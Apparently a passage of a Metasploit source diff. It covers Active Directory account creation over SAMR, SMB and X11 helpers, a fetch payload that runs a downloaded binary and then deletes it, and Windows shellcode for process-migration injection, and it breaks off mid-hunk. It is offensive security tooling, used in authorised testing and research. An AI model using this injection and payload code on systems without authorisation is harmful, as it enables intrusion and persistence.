+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            account_password,
+            @simple.client.application_key
+          )
+        }
+      )
+    )
+    samr_con.samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: uac
+      )
+    )
+    samr_con.samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{samr_con.domain_name}\\#{account_name}")
+    print_good("  Password: #{account_password}")
+    print_good("  SID:      #{get_account_sid(samr_con, account_name)}")
+    report_creds(samr_con.domain_name, account_name, account_password)
+
+    AccountInfo.new(account_name, account_password)
+  rescue RubySMB::Dcerpc::Error::SamrError => e
+    raise MsSamrUnknownError, "A DCERPC SAMR error occurred: #{e.message}"
+  ensure
+    if samr_con
+      samr_con.samr.close_handle(user_handle) if user_handle
+      samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
+      samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
+    end
+  end
+
+  def delete_account(opts = {})
+    tree = opts[:tree] || connect_ipc
+
+    samr_con = connect_samr(tree)
+
+    account_name = opts[:account_name] || datastore['ACCOUNT_NAME']
+    if account_name.blank?
+      raise MsSamrBadConfigError, 'Unable to delete the account since its name is unknown'
+    end
+
+    details = samr_con.samr.samr_lookup_names_in_domain(domain_handle: samr_con.domain_handle, names: [ account_name ])
+    raise MsSamrBadConfigError, 'The specified account was not found.' if details.nil?
+    details = details[account_name]
+
+    user_handle = samr_con.samr.samr_open_user(domain_handle: samr_con.domain_handle, user_id: details[:rid])
+    samr_con.samr.samr_delete_user(user_handle: user_handle)
+    print_good('The specified account has been deleted.')
+  rescue RubySMB::Dcerpc::Error::SamrError => e
+    # `user_handle` only needs to be closed if an error occurs in `samr_delete_user`
+    # If this method succeed, the server took care of closing the handle
+    samr_con.samr.close_handle(user_handle) if user_handle
+    raise MsSamrUnknownError, "Could not delete the account #{account_name}: #{e.message}"
+  ensure
+    if samr_con
+      samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
+      samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
+    end
+  end
+
+  def lookup_account(opts = {})
+    tree = opts[:tree] || connect_ipc
+
+    samr_con = connect_samr(tree)
+
+    account_name = opts[:account_name] || datastore['ACCOUNT_NAME']
+    if account_name.blank?
+      raise MsSamrBadConfigError, 'Unable to lookup the account since its name is unknown'
+    end
+
+    sid = get_account_sid(samr_con, account_name)
+    print_good("Found #{samr_con.domain_name}\\#{account_name} (SID: #{sid})")
+  ensure
+    if samr_con
+      samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
+      samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
+    end
+  end
+
+  module_function
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def get_account_sid(samr_con, account_name)
+    details = samr_con.samr.samr_lookup_names_in_domain(
+      domain_handle: samr_con.domain_handle,
+      names: [ account_name ]
+    )
+    raise MsSamrNotFoundError, 'The account was not found.' if details.nil?
+
+    details = details[account_name]
+    samr_con.samr.samr_rid_to_sid(
+      object_handle: samr_con.domain_handle,
+      rid: details[:rid]
+    ).to_s
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end
+end
@@ -1,203 +0,0 @@
-###
-#
-# This mixin provides methods to add, delete and lookup computer accounts via MS-SAMR
-#
-# -*- coding: binary -*-
-
-module Msf
-
-module Exploit::Remote::MsSamr::Computer
-
-  include Msf::Auxiliary::Report
-  include Msf::Exploit::Remote::MsSamr
-
-  ComputerInfo = Struct.new(:name, :password)
-
-  def initialize(info = {})
-    super
-
-    register_options([
-      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
-      OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ]),
-    ], Msf::Exploit::Remote::MsSamr)
-  end
-
-  def add_computer(opts = {})
-    tree = opts[:tree] || connect_ipc
-
-    samr_con = connect_samr(tree)
-
-    computer_name = opts[:computer_name] || datastore['COMPUTER_NAME']
-    if computer_name.blank?
-      computer_name = random_hostname
-      4.downto(0) do |attempt|
-        break if samr_con.samr.samr_lookup_names_in_domain(
-          domain_handle: samr_con.domain_handle,
-          names: [ computer_name ]
-        ).nil?
-
-        computer_name = random_hostname
-        raise MsSamrBadConfigError, 'Could not find an unused computer name.' if attempt == 0
-      end
-    else
-      if samr_con.samr.samr_lookup_names_in_domain(domain_handle: samr_con.domain_handle, names: [ computer_name ])
-        raise MsSamrBadConfigError, 'The specified computer name already exists.'
-      end
-    end
-
-    result = samr_con.samr.samr_create_user2_in_domain(
-      domain_handle: samr_con.domain_handle,
-      name: computer_name,
-      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
-      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
-    )
-
-    user_handle = result[:user_handle]
-    computer_password = opts[:computer_password] || datastore['COMPUTER_PASSWORD']
-    if computer_password.blank?
-      computer_password = Rex::Text.rand_text_alphanumeric(32)
-    else
-      computer_password = datastore['COMPUTER_PASSWORD']
-    end
-
-    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
-      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
-      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
-        i1: {
-          password_expired: 1,
-          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
-        },
-        user_password: {
-          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
-            computer_password,
-            @simple.client.application_key
-          )
-        }
-      )
-    )
-    samr_con.samr.samr_set_information_user2(
-      user_handle: user_handle,
-      user_info: user_info
-    )
-
-    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
-      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
-      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
-        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
-      )
-    )
-    samr_con.samr.samr_set_information_user2(
-      user_handle: user_handle,
-      user_info: user_info
-    )
-    print_good("Successfully created #{samr_con.domain_name}\\#{computer_name}")
-    print_good("  Password: #{computer_password}")
-    print_good("  SID:      #{get_computer_sid(samr_con, computer_name)}")
-    report_creds(samr_con.domain_name, computer_name, computer_password)
-
-    ComputerInfo.new(computer_name, computer_password)
-
-  rescue RubySMB::Dcerpc::Error::SamrError => e
-    raise MsSamrUnknownError, "A DCERPC SAMR error occurred: #{e.message}"
-  ensure
-    if samr_con
-      samr_con.samr.close_handle(user_handle) if user_handle
-      samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
-      samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
-    end
-  end
-
-  def delete_computer(opts = {})
-    tree = opts[:tree] || connect_ipc
-
-    samr_con = connect_samr(tree)
-
-    computer_name = opts[:computer_name] || datastore['COMPUTER_NAME']
-    if computer_name.blank?
-      raise MsSamrBadConfigError, 'Unable to delete the computer account since its name is unknown'
-    end
-
-    details = samr_con.samr.samr_lookup_names_in_domain(domain_handle: samr_con.domain_handle, names: [ computer_name ])
-    raise MsSamrBadConfigError, 'The specified computer was not found.' if details.nil?
-    details = details[computer_name]
-
-    user_handle = samr_con.samr.samr_open_user(domain_handle: samr_con.domain_handle, user_id: details[:rid])
-    samr_con.samr.samr_delete_user(user_handle: user_handle)
-    print_good('The specified computer has been deleted.')
-  rescue RubySMB::Dcerpc::Error::SamrError => e
-    # `user_handle` only needs to be closed if an error occurs in `samr_delete_user`
-    # If this method succeed, the server took care of closing the handle
-    samr_con.samr.close_handle(user_handle) if user_handle
-    raise MsSamrUnknownError, "Could not delete the computer #{computer_name}: #{e.message}"
-  ensure
-    samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
-    samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
-  end
-
-  def lookup_computer(opts = {})
-    tree = opts[:tree] || connect_ipc
-
-    samr_con = connect_samr(tree)
-
-    computer_name = opts[:computer_name] || datastore['COMPUTER_NAME']
-    if computer_name.blank?
-      raise MsSamrBadConfigError, 'Unable to lookup the computer account since its name is unknown'
-    end
-
-    sid = get_computer_sid(samr_con, computer_name)
-    print_good("Found #{samr_con.domain_name}\\#{computer_name} (SID: #{sid})")
-  ensure
-    samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
-    samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
-  end
-
-  module_function
-
-  def random_hostname(prefix: 'DESKTOP')
-    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
-  end
-
-  def get_computer_sid(samr_con, computer_name)
-    details = samr_con.samr.samr_lookup_names_in_domain(
-      domain_handle: samr_con.domain_handle,
-      names: [ computer_name ]
-    )
-    raise MsSamrNotFoundError, 'The computer was not found.' if details.nil?
-
-    details = details[computer_name]
-    samr_con.samr.samr_rid_to_sid(
-      object_handle: samr_con.domain_handle,
-      rid: details[:rid]
-    ).to_s
-  end
-
-  def report_creds(domain, username, password)
-    service_data = {
-      address: rhost,
-      port: rport,
-      service_name: 'smb',
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
-    credential_data = {
-      module_fullname: fullname,
-      origin_type: :service,
-      private_data: password,
-      private_type: :password,
-      username: username,
-      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-      realm_value: domain
-    }.merge(service_data)
-
-    credential_core = create_credential(credential_data)
-
-    login_data = {
-      core: credential_core,
-      status: Metasploit::Model::Login::Status::UNTRIED
-    }.merge(service_data)
-
-    create_credential_login(login_data)
-  end
-end
-end
@@ -149,10 +149,19 @@ module Msf
      # You should call {#connect} before calling this
      #
      # @param simple_client [Rex::Proto::SMB::SimpleClient] Optional SimpleClient instance to use
+      # @param opts [Hash] Options to override the datastore options
+      # @option :username [String] Override SMBUser datastore option
+      # @option :domain [String] Override SMBDomain datastore option
+      # @option :password [String] Override SMBPass datastore option
+      # @option :auth_protocol [String] Override SMB::Auth datastore option
      # @return [void]
-      def smb_login(simple_client = self.simple)
+      def smb_login(simple_client = self.simple, opts: {})
+        username = opts.fetch(:username) {datastore['SMBUser']}
+        domain = opts.fetch(:domain) {datastore['SMBDomain']}
+        password = opts.fetch(:password) {datastore['SMBPass']}
+        smb_auth = opts.fetch(:auth_protocol) {datastore['SMB::Auth']}
        # Override the default RubySMB capabilities with Kerberos authentication
-        if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+        if smb_auth == Msf::Exploit::Remote::AuthOption::KERBEROS
          fail_with(Msf::Exploit::Failure::BadConfig, 'The Smb::Rhostname option is required when using Kerberos authentication.') if datastore['Smb::Rhostname'].blank?
          fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
          offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['Smb::KrbOfferedEncryptionTypes'])
@@ -162,9 +171,9 @@ module Msf
            host: datastore['DomainControllerRhost'].blank? ? nil : datastore['DomainControllerRhost'],
            hostname: datastore['Smb::Rhostname'],
            proxies: datastore['Proxies'],
-            realm: datastore['SMBDomain'],
-            username: datastore['SMBUser'],
-            password: datastore['SMBPass'],
+            realm: domain,
+            username: username,
+            password: password,
            framework: framework,
            framework_module: self,
            cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
@@ -178,9 +187,9 @@ module Msf

        simple_client.login(
          datastore['SMBName'],
-          datastore['SMBUser'],
-          datastore['SMBPass'],
-          datastore['SMBDomain'],
+          username,
+          password,
+          domain,
          datastore['SMB::VerifySignature'],
          datastore['NTLM::UseNTLMv2'],
          datastore['NTLM::UseNTLM2_session'],
@@ -21,11 +21,11 @@ module Msf
      end

      def smb_logger
-        if datastore['VERBOSE']
-          log_device = Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Module.new(self)
-        else
-          Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Framework.new(framework)
-        end
+        log_device = if datastore['VERBOSE']
+                       Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Module.new(self)
+                     else
+                       Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Framework.new(framework)
+                     end

        Msf::Exploit::Remote::SMB::LogAdapter::Logger.new(self, log_device)
      end
@@ -0,0 +1,7 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::X11
+  include Msf::Exploit::Remote::X11::Connect
+  include Msf::Exploit::Remote::X11::Extension
+  include Msf::Exploit::Remote::X11::Read
+end
@@ -0,0 +1,55 @@
+# -*- coding: binary -*-
+
+#
+# This mixin is a simplistic implementation of X11 initial connection protocol
+#
+# Wireshark dissector: https://wiki.wireshark.org/X11
+#
+
+module Msf::Exploit::Remote::X11::Connect
+  include Rex::Proto::X11::Connect
+
+  # function used to send the request and receive the response
+  # for establishing an X11 session.
+  def x11_connect
+    sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
+    packet = ''
+    connection = nil
+    begin
+      header_data = sock.timed_read(X11ConnectHeader.new.num_bytes)
+      return nil if header_data.nil?
+
+      header = X11ConnectHeader.read(header_data)
+      if header.success == 0
+        body_data = sock.timed_read(header.pad0)
+      else
+        body_data = sock.timed_read(header.response_length * 4)
+      end
+      return nil if body_data.nil?
+
+      return X11Connection.read(header_data + body_data)
+    rescue StandardError => e
+      vprint_bad("Error (#{e}) processing data: #{packet.bytes.map { |b| %(\\x) + b.to_s(16).rjust(2, '0') }.join}")
+    end
+    connection
+  end
+
+  # print out the information for an x11 connection which was
+  # successfully established
+  def x11_print_connection_info(connection, ip, port)
+    print_good("#{ip} - Successfully established X11 connection")
+    vprint_status("  Vendor: #{connection.body.vendor}")
+    vprint_status("  Version: #{connection.header.protocol_version_major}.#{connection.header.protocol_version_minor}")
+    vprint_status("  Screen Resolution: #{connection.body.screen_width_in_pixels}x#{connection.body.screen_height_in_pixels}")
+    vprint_status("  Resource ID: #{connection.body.resource_id_base.inspect}")
+    vprint_status("  Screen root: #{connection.body.screen_root.inspect}")
+    report_note(
+      host: ip,
+      proto: 'tcp',
+      sname: 'x11',
+      port: port,
+      type: 'x11.server_vendor',
+      data: "Open X Server (#{connection.body.vendor})"
+    )
+  end
+end
@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+
+#
+# This mixin is a simplistic implementation of X11 initial connection protocol
+#
+# Wireshark dissector: https://wiki.wireshark.org/X11
+#
+
+module Msf::Exploit::Remote::X11::Extension
+  include Msf::Exploit::Remote::X11::Read
+  include Rex::Proto::X11::Extension
+
+  # Query for an extension, converts the name of the extension to the ID #
+  def x11_query_extension(extension_name, call_count)
+    sock.put(X11QueryExtensionRequest.new(extension: extension_name, unused2: call_count).to_binary_s)
+    x11_read_response(X11QueryExtensionResponse)
+  end
+
+  # toggles an extension on or off (enable/disable)
+  def x11_toggle_extension(extension_id, wanted_major: 0, toggle: true)
+    sock.put(
+      X11ExtensionToggleRequest.new(
+        opcode: extension_id,
+        toggle: (toggle ? 0 : 1), # 0 is enable, 1 is disable
+        wanted_major: wanted_major
+      ).to_binary_s
+    )
+    x11_read_response(X11ExtensionToggleResponse)
+  end
+end
@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::X11::Read
+  def x11_read_response(klass, timeout: 10)
+    unless klass.fields.field_name?(:response_length)
+      raise ::ArgumentError, 'X11 class must have the response_length field to be read'
+    end
+
+    remaining = timeout
+    reply_instance = klass.new
+
+    metalength = reply_instance.response_length.num_bytes
+    buffer, elapsed_time = Rex::Stopwatch.elapsed_time do
+      sock.read(reply_instance.response_length.abs_offset + metalength, remaining)
+    end
+    raise ::EOFError, 'X11: failed to read response' if buffer.nil?
+
+    remaining -= elapsed_time
+
+    # see: https://www.x.org/releases/X11R7.7/doc/xproto/x11protocol.html#request_format
+    response_length = reply_instance.response_length.read(buffer[-metalength..]).value
+    response_length *= 4 # field is in 4-byte units
+    response_length += 32 # 32 byte header is not included
+
+    while buffer.length < response_length && remaining > 0
+      chunk, elapsed_time = Rex::Stopwatch.elapsed_time do
+        sock.read(response_length - buffer.length, remaining)
+      end
+
+      remaining -= elapsed_time
+      break if chunk.nil?
+
+      buffer << chunk
+    end
+
+    unless buffer.length == response_length
+      if remaining <= 0
+        raise Rex::TimeoutError, 'X11: failed to read response due to timeout'
+      end
+
+      raise ::EOFError, 'X11: failed to read response'
+    end
+
+    reply_instance.read(buffer)
+  end
+end
@@ -28,6 +28,7 @@ module Msf
    MSSQL_SESSION_TYPE = 'mssql_session_type'
    LDAP_SESSION_TYPE = 'ldap_session_type'
    SHOW_SUCCESSFUL_LOGINS = 'show_successful_logins'
+    DISPLAY_MODULE_ACTION = 'display_module_action'

    DEFAULTS = [
      {
@@ -124,6 +125,13 @@ module Msf
        requires_restart: false,
        default_value: true,
        developer_notes: 'Enabled in Metasploit 6.4.x'
+      }.freeze,
+      {
+        name: DISPLAY_MODULE_ACTION,
+        description: 'When enabled after using a module the current action and number of actions will be displayed',
+        requires_restart: false,
+        default_value: true,
+        developer_notes: 'Added as a feature so users can turn it off if they wish to reduce clutter in their terminal'
      }.freeze
    ].freeze

@@ -20,13 +20,22 @@ module Msf
    def valid?(value = self.value, check_empty: true)
      return false if check_empty && empty_required_value?(value)
      return true if value.nil? && !required?
+      return false if value.nil?

-      !value.nil? && enums.include?(value.to_s)
+      if case_sensitive?
+        enums.include?(value.to_s)
+      else
+        enums.map(&:downcase).include?(value.to_s.downcase)
+      end
    end

    def normalize(value = self.value)
      if valid?(value) && !value.nil?
-        value.to_s
+        if case_sensitive?
+          value.to_s
+        else
+          enums.find { |e| e.casecmp? value }
+        end
      else
        nil
      end
@@ -44,6 +53,10 @@ module Msf

    protected

+    def case_sensitive?
+      enums.map(&:downcase).uniq.length != enums.uniq.length
+    end
+
    attr_accessor :desc_string # :nodoc:
  end
 end
@@ -202,9 +202,9 @@ module Msf::Payload::Adapter::Fetch
  end

  def _execute_nix
-    cmds = "; chmod +x #{_remote_destination_nix}"
-    cmds << "; #{_remote_destination_nix} &"
-    cmds << ";rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
+    cmds = ";chmod +x #{_remote_destination_nix}"
+    cmds << ";#{_remote_destination_nix}&"
+    cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
    cmds
  end

@@ -21,15 +21,15 @@ module Msf::Payload::Windows

  #
  # ROR hash associations for some of the exit technique routines.
-  #
+
  @@exit_types =
    {
      nil       => 0,          # Default to nothing
      ''        => 0,          # Default to nothing
-      'seh'     => 0xEA320EFE, # SetUnhandledExceptionFilter
-      'thread'  => 0x0A2A1DE0, # ExitThread
-      'process' => 0x56A2B5F0, # ExitProcess
-      'none'    => 0x5DE2C5AA  # GetLastError
+      'seh'     => Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter").to_i(16), # SetUnhandledExceptionFilter
+      'thread'  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+      'process' => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+      'none'    => Rex::Text.block_api_hash("kernel32.dll", "GetLastError").to_i(16)  # GetLastError
    }

  #
@@ -33,13 +33,13 @@ module Payload::Windows::Exitfunk
    when 'thread'
      asm << %Q^
        mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
-        push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+        push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
        call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
        cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
        jl exitfunk_goodbye    ; Then just call the exit function...
        cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
        jne exitfunk_goodbye   ;
-        mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+        mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}     ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
      exitfunk_goodbye:        ; We now perform the actual call to the exit function
        push.i8 0              ; push the exit function parameter
        push ebx               ; push the hash of the exit function
@@ -63,105 +63,35 @@ module Msf::Payload::Windows::PrependMigrate
    block_api_start = <<-EOS
      call start
    EOS
-    block_api_asm = <<-EOS
-    api_call:
-      pushad                    ; We preserve all the registers for the caller, bar EAX and ECX.
-      mov ebp, esp              ; Create a new stack frame
-      xor eax, eax              ; Zero EAX (upper 3 bytes will remain zero until function is found)
-      mov edx, [fs:eax+48]      ; Get a pointer to the PEB
-      mov edx, [edx+12]         ; Get PEB->Ldr
-      mov edx, [edx+20]         ; Get the first module from the InMemoryOrder module list
-    next_mod:                   ;
-      mov esi, [edx+40]         ; Get pointer to modules name (unicode string)
-      movzx ecx, word [edx+38]  ; Set ECX to the length we want to check
-      xor edi, edi              ; Clear EDI which will store the hash of the module name
-    loop_modname:               ;
-      lodsb                     ; Read in the next byte of the name
-      cmp al, 'a'               ; Some versions of Windows use lower case module names
-      jl not_lowercase          ;
-      sub al, 0x20              ; If so normalise to uppercase
-    not_lowercase:              ;
-      ror edi, 13               ; Rotate right our hash value
-      add edi, eax              ; Add the next byte of the name
-      loop loop_modname         ; Loop until we have read enough
-
-      ; We now have the module hash computed
-      push edx                  ; Save the current position in the module list for later
-      push edi                  ; Save the current module hash for later
-      ; Proceed to iterate the export address table
-      mov edx, [edx+16]         ; Get this modules base address
-      mov ecx, [edx+60]         ; Get PE header
-
-      ; use ecx as our EAT pointer here so we can take advantage of jecxz.
-      mov ecx, [ecx+edx+120]    ; Get the EAT from the PE header
-      jecxz get_next_mod1       ; If no EAT present, process the next module
-      add ecx, edx              ; Add the modules base address
-      push ecx                  ; Save the current modules EAT
-      mov ebx, [ecx+32]         ; Get the rva of the function names
-      add ebx, edx              ; Add the modules base address
-      mov ecx, [ecx+24]         ; Get the number of function names
-      ; now ecx returns to its regularly scheduled counter duties
-
-      ; Computing the module hash + function hash
-    get_next_func:              ;
-      jecxz get_next_mod        ; When we reach the start of the EAT (we search backwards), process the next module
-      dec ecx                   ; Decrement the function name counter
-      mov esi, [ebx+ecx*4]      ; Get rva of next module name
-      add esi, edx              ; Add the modules base address
-      xor edi, edi              ; Clear EDI which will store the hash of the function name
-      ; And compare it to the one we want
-    loop_funcname:              ;
-      lodsb                     ; Read in the next byte of the ASCII function name
-      ror edi, 13               ; Rotate right our hash value
-      add edi, eax              ; Add the next byte of the name
-      cmp al, ah                ; Compare AL (the next byte from the name) to AH (null)
-      jne loop_funcname         ; If we have not reached the null terminator, continue
-      add edi, [ebp-8]          ; Add the current module hash to the function hash
-      cmp edi, [ebp+36]         ; Compare the hash to the one we are searchnig for
-      jnz get_next_func         ; Go compute the next function hash if we have not found it
-
-      ; If found, fix up stack, call the function and then value else compute the next one...
-      pop eax                   ; Restore the current modules EAT
-      mov ebx, [eax+36]         ; Get the ordinal table rva
-      add ebx, edx              ; Add the modules base address
-      mov cx, [ebx+2*ecx]       ; Get the desired functions ordinal
-      mov ebx, [eax+28]         ; Get the function addresses table rva
-      add ebx, edx              ; Add the modules base address
-      mov eax, [ebx+4*ecx]      ; Get the desired functions RVA
-      add eax, edx              ; Add the modules base address to get the functions actual VA
-      ; We now fix up the stack and perform the call to the desired function...
-    finish:
-      mov [esp+36], eax         ; Overwrite the old EAX value with the desired api address for the upcoming popad
-      pop ebx                   ; Clear off the current modules hash
-      pop ebx                   ; Clear off the current position in the module list
-      popad                     ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
-      pop ecx                   ; Pop off the original return address our caller will have pushed
-      pop edx                   ; Pop off the hash value our caller will have pushed
-      push ecx                  ; Push back the correct return value
-      jmp eax                   ; Jump into the required function
-      ; We now automagically return to the correct caller...
-
-    get_next_mod:               ;
-      pop edi                   ; Pop off the current (now the previous) modules EAT
-    get_next_mod1:              ;
-      pop edi                   ; Pop off the current (now the previous) modules hash
-      pop edx                   ; Restore our position in the module list
-      mov edx, [edx]            ; Get the next module
-      jmp.i8 next_mod           ; Process this module
-    ;--------------------------------------------------------------------------------------
-    EOS
+    block_api_obj = Object.new.extend(Msf::Payload::Windows::BlockApi)
+    block_api_asm = block_api_obj.asm_block_api

    # Prepare default exit block (sleep for a long long time)
-    exitblock = <<-EOS
+    exitblock = %Q^
      ;sleep
      push -1
-      push 0xE035F044           ; hash( "kernel32.dll", "Sleep" )
+      push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")}           ; hash( "kernel32.dll", "Sleep" )
      call ebp                  ; Sleep( ... );
-    EOS
-
+    ^
+    
    # Check to see if we can find exitfunc in the payload
-    exitfunc_index = buf.index("\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
-            "\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5")
+    exitfunc_block_asm = %Q^
+    exitfunk:
+      mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")}    ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
+      push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
+      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      cmp al, 6         ; If we are not running on Windows Vista, 2008 or 7
+      jl goodbye       ; Then just call the exit function...
+      cmp bl, 0xE0            ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+      jne goodbye      ;
+      mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye:                 ; We now perform the actual call to the exit function
+    goodbye:  
+      push 0x0            ; push the exit function parameter
+      push ebx               ; push the hash of the exit function
+      call ebp               ; call EXITFUNK( 0 );
+    ^
+    exitfunc_block_blob = Metasm::Shellcode.assemble(Metasm::Ia32.new, exitfunc_block_asm).encode_string
+    exitfunc_index = buf.index(exitfunc_block_blob)
    if exitfunc_index
      exitblock_offset = "0x%04x + payload - exitblock" % (exitfunc_index - 5)
      exitblock = "exitblock:\njmp $+#{exitblock_offset}"
@@ -205,7 +135,7 @@ module Msf::Payload::Windows::PrependMigrate
      add esp,-400              ; adjust the stack to avoid corruption
      lea edx,[esp+0x60]
      push edx
-      push 0xB16B4AB1           ; hash( "kernel32.dll", "GetStartupInfoA" )
+      push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")}           ; hash( "kernel32.dll", "GetStartupInfoA" )
      call ebp                  ; GetStartupInfoA( &si );

      lea eax,[esp+0x60]        ; Put startupinfo pointer back in eax
@@ -228,7 +158,7 @@ module Msf::Payload::Windows::PrependMigrate
      push esi                  ; lpCommandLine
      push ebx                  ; lpApplicationName

-      push 0x863FCC79           ; hash( "kernel32.dll", "CreateProcessA" )
+      push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")}           ; hash( "kernel32.dll", "CreateProcessA" )
      call ebp                  ; CreateProcessA( &si );

      ; if we didn't get a new process, use this one
@@ -256,7 +186,7 @@ module Msf::Payload::Windows::PrependMigrate
      xor ebx,ebx
      push ebx                  ; address
      push [edi]                ; handle
-      push 0x3F9287AE           ; hash( "kernel32.dll", "VirtualAllocEx" )
+      push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
      call ebp                  ; VirtualAllocEx( ...);

      ; eax now contains the destination
@@ -268,7 +198,7 @@ module Msf::Payload::Windows::PrependMigrate
      begin_of_payload_return:  ; lpBuffer
      push eax                  ; lpBaseAddress
      push [edi]                ; hProcess
-      push 0xE7BDD8C5           ; hash( "kernel32.dll", "WriteProcessMemory" )
+      push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
      call ebp                  ; WriteProcessMemory( ...)

      ; run the code (CreateRemoteThread())
@@ -280,7 +210,7 @@ module Msf::Payload::Windows::PrependMigrate
      push ebx                  ; stacksize
      push ebx                  ; lpThreadAttributes
      push [edi]
-      push 0x799AACC6           ; hash( "kernel32.dll", "CreateRemoteThread" )
